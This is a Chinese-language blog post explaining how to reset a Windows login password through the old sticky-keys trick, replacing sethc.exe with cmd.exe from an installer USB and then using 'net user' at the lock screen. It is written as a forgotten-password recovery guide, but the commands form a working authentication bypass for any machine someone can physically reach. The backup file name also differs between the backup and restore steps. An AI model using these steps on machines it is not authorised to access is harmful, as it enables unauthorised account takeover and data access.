利用上古 Windows 漏洞重置系统解锁密码

利用上古 Windows 漏洞重置系统解锁密码

忘记了系统解锁密码怎么办?(假装忘记)利用 Windows 粘滞键(或其他”轻松使用”功能)重置系统解锁密码 : )

Windows 20H2 2 月更新后依然适用

准备

  • 装有 Linux live system 或者 Windows 安装程序的 U 盘一个

步骤

以下步骤使用 Ventoy,进入 Windows 20H2 安装程序

替换 sethc.exe

  1. 进入 Windows 安装程序(如果使用 Linux live system,将下列指令替换为 linux 指令即可)利用上古 Windows 漏洞重置系统解锁密码
  2. 在安装界面按下 Shift + F10 打开(管理员)命令提示符
    利用上古 Windows 漏洞重置系统解锁密码
  3. 使用 dir 命令找到并进入 Windows 系统的安装盘,通常为 C 盘利用上古 Windows 漏洞重置系统解锁密码
  4. 使用 cmd.exe 替换 sethc.exe
    • 进入 C:\Windows\system32
      cd windows\system32
    • 备份 sethc.exe
      xcopy sethc.exe seth_backup.exe

      利用上古 Windows 漏洞重置系统解锁密码

    • 替换 sethc.exe
      xcopy cmd.exe sethc.exe

      利用上古 Windows 漏洞重置系统解锁密码

  5. 取消安装,重启进入 Windows 系统

重置密码

  1. Windows 解锁界面连按 5 次 Shift 键就可以打开带管理员权限的命令提示符利用上古 Windows 漏洞重置系统解锁密码
  2. 重置密码
    net user # 查看用户名
    net user [用户名] [新密码]

    利用上古 Windows 漏洞重置系统解锁密码

还原 sethc.exe

进入系统后,使用管理员权限打开命令提示符,执行指令

# 查看目录下的 sethc 和备份文件
dir sethc*.exe
# 获取 sethc.exe 的管理权限
takeown -F sethc.exe
# 获取 sethc.exe 的写权限
icacls sethc.exe /grant [用户名]:F /t /q
# 使用备份覆盖修改过的 sethc.exe
move sethc_backup.exe sethc.exe

利用上古 Windows 漏洞重置系统解锁密码

原理

从 Windows 2000 开始,连按 5 次 Shift 键系统就会执行 sethc.exe 开启/关闭粘滞键,这一操作在锁屏界面下也可以触发

用 cmd 替换 sethc 后,连按 5 次 Shift 就会开启命令行,并且带有管理员权限,就可以在不进入系统的情况下重置密码

如果禁用了粘滞键,也可以替换 utilman.exe (Windows + U 触发) 等程序达到同样的效果

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据